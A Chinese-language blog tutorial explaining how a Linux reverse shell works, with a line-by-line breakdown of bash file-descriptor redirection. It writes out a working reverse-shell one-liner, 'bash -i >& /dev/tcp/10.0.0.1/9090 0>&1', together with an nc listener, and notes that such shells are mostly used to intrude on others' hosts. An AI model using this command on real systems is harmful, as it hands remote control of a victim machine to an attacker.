zoukankan      html  css  js  c++  java
  • linux反弹shell命令解析

    今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell

    1. 什么是反弹shell

    简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。

    2. 反弹shell的用途

    这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙

    3. 反弹shell操作步骤

    3.1. 在本机开启端口9090

    nc -lk 9090

    3.2. 在需要被控制的机器上执行如下两种命令中的一种即可

    bash -i >& /dev/tcp/10.0.0.1/9090 0>&1

    3.3. 在本机刚才执行nc -lk 9090命令行下面输入需要被控制的主机的命令即可

    4. 原理

    1. A主机开启9090端口的tcp服务

    2. B主机连接到A主机的9090的tcp服务

    3. A主机通过tcp服务把命令发到B主机

    4. B主机读取命令并且在bash中执行

    5. B主机把执行结果发给A主机

    这样就可以在A主机中'玩弄'B主机了

    下面重点来了

    我们看这个操作其实还是蛮简单的,但是我们不能只局限于表面。我们需要去了解它的原理
    其实nc -lk 9090命令没什么可说的,百度google一搜就出来了。我们今天要去解释的是bash -i >& /dev/tcp/10.0.0.1/9090 0>&1。这条命令在google也没搜出来什么结果。所以只能自己加夜班搞了。

    inux shell下常用的文件描述符是:

    1. 标准输入 (stdin) :代码为 0 ,使用 < 或 << ;

    2. 标准输出 (stdout):代码为 1 ,使用 > 或 >> ;

    3. 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。

    首先我们把这个命令拆解一下

    bash -i  # 这个也不知道说啥
    >&       # 这条命令 其实就是把stderr也输入到 stdout。它相当于 `> xxx 2>&1`
    /dev/tcp/10.0.0.1/9090  # 这个就是连接到10.0.0.1的9090端口
    0>&1   # 这个在google百度上查了半天也没搞懂,只能去研究文档

    其实前面3个命令组合在一起很好理解,就是把这个bash下的所有输出都发送到 10.0.0.1:9090。这个大家可以自己操作一下,去掉后面的 0>&1。

    我们在命令里面写 2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我们看下文件描述符

    这里看到的是2>&1就是把文件描述符2对应的设备改成了文件描述符1对应的设备。那么同理 0>&1就是把 0对应的设备改成的1对应的设备,那也就是socket。这就表明了 stdin就是从socket中读取数据,然后再执行命令,把bash的命令行返回内容通过stdout发到socket。

    其实这些内容都可以在bash的man pages里面找到

     

    文档里面写的很清楚 n<&word 是吧word复制给n, n>&word是吧word复制给n。
    所以这里写 0<&1 或者是 0>&1都是可以的,只要把文件描述符1对应的设备复制给文件描述符0就可以了

  • 相关阅读:
    python列表
    OSS对象存储的文件上传、解冻、下载与查看
    常用压缩命令
    SWAP
    K8S_第一课作业_20200407
    K8S--- yaml配置文件
    K8S 简介
    php-fpm进程数控制
    linux常用查询命令
    Docker Note1——架构和三要素
  • 原文地址:https://www.cnblogs.com/bl8ck/p/9428990.html
Copyright © 2011-2022 走看看